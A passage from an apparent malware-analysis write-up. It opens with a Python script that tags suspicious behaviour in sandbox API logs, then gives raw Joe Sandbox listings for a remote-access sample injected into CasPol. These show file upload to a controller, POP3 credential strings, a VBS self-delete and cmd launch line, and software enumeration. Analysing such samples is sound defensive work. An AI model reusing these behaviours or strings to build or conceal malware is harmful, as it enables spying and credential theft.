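NTDLL_INTERNAL_PREFIXES = ("Nt", "Ldr", "RtlAcquirePebLock", "RtlReleasePebLock")


@dataclass
class Call:
    api: str
    module: str
    args: list
    ref: str


def parse_call(line: str) -> "Call | None":
    m = CALL_RE.search(line)
    if not m:
        return None
    args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
    return Call(m["api"], m["mod"], args, m["ref"])


def decode_attrs(mask: int) -> list:
    """Names of the FILE_ATTRIBUTE_* bits set in mask, lowest bit first."""
    return [name for bit, name in sorted(FILE_ATTRS.items()) if mask & bit]


def triage(lines: list) -> set:
    calls = [c for c in map(parse_call, lines) if c]
    apis = {c.api for c in calls}
    tags = set()
    written = {a for c in calls if c.api == "WriteFile" for a in c.args}
    if {"RIFF", "WAVE", "data"} <= written and any(a.startswith("fmt") for a in written):
        tags.add("writes RIFF/WAVE file (audio capture to disk)")
    for c in calls:
        if c.api == "SetFileAttributesW" and len(c.args) >= 2:
            try:
                mask = int(c.args[1], 16)
            except ValueError:
                continue
            if mask & 0x6:                      # HIDDEN or SYSTEM requested
                tags.add("hides dropped file: " + "|".join(decode_attrs(mask)))
        if (c.api == "GetModuleHandleW" and len(c.args) > 1
                and c.args[0] == "ntdll.dll"
                and c.args[1].startswith(NTDLL_INTERNAL_PREFIXES)):
            tags.add("resolves ntdll internal by name: " + c.args[1])
    if {"CopyFileW", "ShellExecuteW", "ExitProcess"} <= apis:
        tags.add("copies itself, launches the copy, exits (install)")
    if {"FindFirstVolumeW", "FindNextVolumeW"} <= apis:
        tags.add("enumerates volumes")
    if any(c.api.startswith("mciSendString") for c in calls):
        tags.add("drives audio device via MCI command strings")
    return tags


# Lines copied from the listings above (install routine, ntdll resolver,
# WAV writer, volume enumeration).
SAMPLE_INSTALL = [
    "• _wcslen.LIBCMT ref: 0040CE42",
    "• CopyFileW.KERNEL32 ref: 0040CF0B",
    "• SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE",
    "• ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086",
    "• ExitProcess.KERNEL32 ref: 0040D09D",
]
SAMPLE_NTDLL = [
    "• GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD",
    "• GetProcAddress.KERNEL32(00000000), ref: 004072E0",
    "• GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305",
]
SAMPLE_WAV = [
    "• WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401D7F",
    "• WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401D9F",
    "• WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401DAF",
    "• WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401E33",
]
SAMPLE_VOLUMES = [
    "• FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133",
    "• FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD",
]
```

The rules key on API name plus the argument literals the report preserves, which is why the attribute mask and the ntdll export names are checked directly; arguments the sandbox could not resolve show up as `?` or a raw address and are simply not matched.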
APIs
  • Part of subcall function 10001CCA: CopyFileW.KERNEL32(?,?,00000000), ref: 10001D1B
  • Part of subcall function 10001CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 10001D37
  • Part of subcall function 10001CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
• _strlen.LIBCMT ref: 10001855
• _strlen.LIBCMT ref: 10001869
• _strlen.LIBCMT ref: 1000188B
• _strlen.LIBCMT ref: 100018AE
• _strlen.LIBCMT ref: 100018C8
Strings
Memory Dump Source
• Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
Similarity
• API ID: _strlen$File$CopyCreateDelete
• String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
• API String ID: 3296212668-3023110444
• Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
• Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
• Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
• Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
APIs
• lstrlenW.KERNEL32(?), ref: 0041C0C7
• _memcmp.LIBVCRUNTIME ref: 0041C0DF
• lstrlenW.KERNEL32(?), ref: 0041C0F8
• FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
• GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
• QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
• lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
• FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
• _wcslen.LIBCMT ref: 0041C1CC
                                                                                                                                                                          • FindVolumeClose.KERNEL32(?), ref: 0041C1EC
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041C204
                                                                                                                                                                          • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                                                                                                                                                                          • lstrcatW.KERNEL32(?,?), ref: 0041C24A
                                                                                                                                                                          • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041C261
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                                                                                          • String ID: ?
                                                                                                                                                                          • API String ID: 3941738427-1684325040
                                                                                                                                                                          • Opcode ID: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                                                                                                                                          • Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
                                                                                                                                                                          • Opcode Fuzzy Hash: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                                                                                                                                          • Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _strlen
                                                                                                                                                                          • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                                                                                          • API String ID: 4218353326-230879103
                                                                                                                                                                          • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                                          • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                                                                                                                                                          • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                                          • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$EnvironmentVariable
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1464849758-0
                                                                                                                                                                          • Opcode ID: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                                                                                                                                          • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                                                                                                                                                                          • Opcode Fuzzy Hash: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                                                                                                                                          • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                                                                                                                                                                          APIs
                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
                                                                                                                                                                          • RegEnumKeyExA.ADVAPI32 ref: 0041C786
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0041CA50
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseEnumOpen
                                                                                                                                                                          • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                                                                                                          • API String ID: 1332880857-3714951968
                                                                                                                                                                          • Opcode ID: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                                                                                                                                                          • Instruction ID: 8204223968f620e226549da85b9b34a309c849e8d9bbed411749b7727356edba
                                                                                                                                                                          • Opcode Fuzzy Hash: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                                                                                                                                                          • Instruction Fuzzy Hash: 3E8133311082459BC325EF11D851EEFB7E8BF94309F10492FB589921A2FF74AE49CA5A
                                                                                                                                                                          APIs
                                                                                                                                                                          • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 0041D67A
                                                                                                                                                                          • SetForegroundWindow.USER32(?), ref: 0041D683
                                                                                                                                                                          • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                                                                                                                                                          • Shell_NotifyIconA.SHELL32(00000002,00474B58), ref: 0041D6EE
                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0041D6F6
                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 0041D6FC
                                                                                                                                                                          • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                                                                                          • String ID: Close
                                                                                                                                                                          • API String ID: 1657328048-3535843008
                                                                                                                                                                          • Opcode ID: 73816c5193d16127c0aec765399ca9dfe531eb1d692a29e38a1feb3416d684dd
                                                                                                                                                                          • Instruction ID: b66198a42bffced696eb94d9f3abdc54ecf3157c52e3fd06dc0985426ba48be4
                                                                                                                                                                          • Opcode Fuzzy Hash: 73816c5193d16127c0aec765399ca9dfe531eb1d692a29e38a1feb3416d684dd
                                                                                                                                                                          • Instruction Fuzzy Hash: 51216BB1500208FFDF054FA4ED0EAAA7B35EB08302F000125FA19950B2D779EDA1EB18
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$Info
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2509303402-0
                                                                                                                                                                          • Opcode ID: 265d55c29888f35ec20f5081f159e7cd252a50d65c59893da787bb4e51b2451e
                                                                                                                                                                          • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                                                                                                                                                                          • Opcode Fuzzy Hash: 265d55c29888f35ec20f5081f159e7cd252a50d65c59893da787bb4e51b2451e
                                                                                                                                                                          • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___free_lconv_mon.LIBCMT ref: 0045138A
                                                                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                                                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                                                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                                                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                                                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                                                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                                                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                                                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                                                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                                                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                                                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                                                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                                                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                                                                                                                                                          • _free.LIBCMT ref: 0045137F
                                                                                                                                                                            • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                                                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                                                          • _free.LIBCMT ref: 004513A1
                                                                                                                                                                          • _free.LIBCMT ref: 004513B6
                                                                                                                                                                          • _free.LIBCMT ref: 004513C1
                                                                                                                                                                          • _free.LIBCMT ref: 004513E3
                                                                                                                                                                          • _free.LIBCMT ref: 004513F6
                                                                                                                                                                          • _free.LIBCMT ref: 00451404
                                                                                                                                                                          • _free.LIBCMT ref: 0045140F
                                                                                                                                                                          • _free.LIBCMT ref: 00451447
                                                                                                                                                                          • _free.LIBCMT ref: 0045144E
                                                                                                                                                                          • _free.LIBCMT ref: 0045146B
                                                                                                                                                                          • _free.LIBCMT ref: 00451483
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                           • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                           • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 161543041-0
                                                                                                                                                                          • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                                                                                                          • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                                                                                                                                                                          • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                                                                                                          • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                                                                                                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                                                                                                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                                                                                                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                                                                                                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                                                                                                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                                                                                                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                                                                                                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                                                                                                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                                                                                                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                                                                                                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                                                                                                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                                                                                                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                                                                                                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                                                                                                                                          • _free.LIBCMT ref: 10007CFB
                                                                                                                                                                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                          • _free.LIBCMT ref: 10007D1D
                                                                                                                                                                          • _free.LIBCMT ref: 10007D32
                                                                                                                                                                          • _free.LIBCMT ref: 10007D3D
                                                                                                                                                                          • _free.LIBCMT ref: 10007D5F
                                                                                                                                                                          • _free.LIBCMT ref: 10007D72
                                                                                                                                                                          • _free.LIBCMT ref: 10007D80
                                                                                                                                                                          • _free.LIBCMT ref: 10007D8B
                                                                                                                                                                          • _free.LIBCMT ref: 10007DC3
                                                                                                                                                                          • _free.LIBCMT ref: 10007DCA
                                                                                                                                                                          • _free.LIBCMT ref: 10007DE7
                                                                                                                                                                          • _free.LIBCMT ref: 10007DFF
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                           • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                           • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 161543041-0
                                                                                                                                                                          • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                                                                          • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                                                                                                                                          • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                                                                          • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00408D1E
                                                                                                                                                                          • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                                                                                                                                                          • __aulldiv.LIBCMT ref: 00408D88
                                                                                                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                          • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00408FE9
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00409037
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                           • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                           • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                                                                                                                          • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                                                                                                                                                                          • API String ID: 3086580692-2596673759
                                                                                                                                                                          • Opcode ID: 24d810a3f019c87a23bb815d1b7d5752fc2f7c92a672c11a81405aaa153c8293
                                                                                                                                                                          • Instruction ID: 2d1ece25e1b497defd969945f9de4b01d63c4d7912a1bb42583949d7b10afa87
                                                                                                                                                                          • Opcode Fuzzy Hash: 24d810a3f019c87a23bb815d1b7d5752fc2f7c92a672c11a81405aaa153c8293
                                                                                                                                                                          • Instruction Fuzzy Hash: 76B1A0316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB9B
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                                                                                            • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                                                                                                            • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                                                                                                                                                                            • Part of subcall function 00413733: RegQueryValueExA.KERNEL32 ref: 00413768
                                                                                                                                                                            • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                                                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0040D9FF
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                           • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                           • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                                                                                          • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$h]v$open
                                                                                                                                                                          • API String ID: 1913171305-1625270436
                                                                                                                                                                          • Opcode ID: 3db2f40e860cf368b09a492d058d5dd719d2791db20602249bb2ee0439c4b327
                                                                                                                                                                          • Instruction ID: 050033375253242a90a907d975c9615f3488646990559cd5331657e2136e0730
                                                                                                                                                                          • Opcode Fuzzy Hash: 3db2f40e860cf368b09a492d058d5dd719d2791db20602249bb2ee0439c4b327
                                                                                                                                                                          • Instruction Fuzzy Hash: 514139319001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E4ACA98
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                           • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                           • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                          • Opcode ID: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                                                                                                                                          • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                                                                                                                                                                          • Opcode Fuzzy Hash: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                                                                                                                                          • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00455929: CreateFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00455946
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00455D6F
                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00455D76
                                                                                                                                                                          • GetFileType.KERNEL32 ref: 00455D82
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00455D8C
                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00455D95
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00455EFF
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00455F31
                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00455F38
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
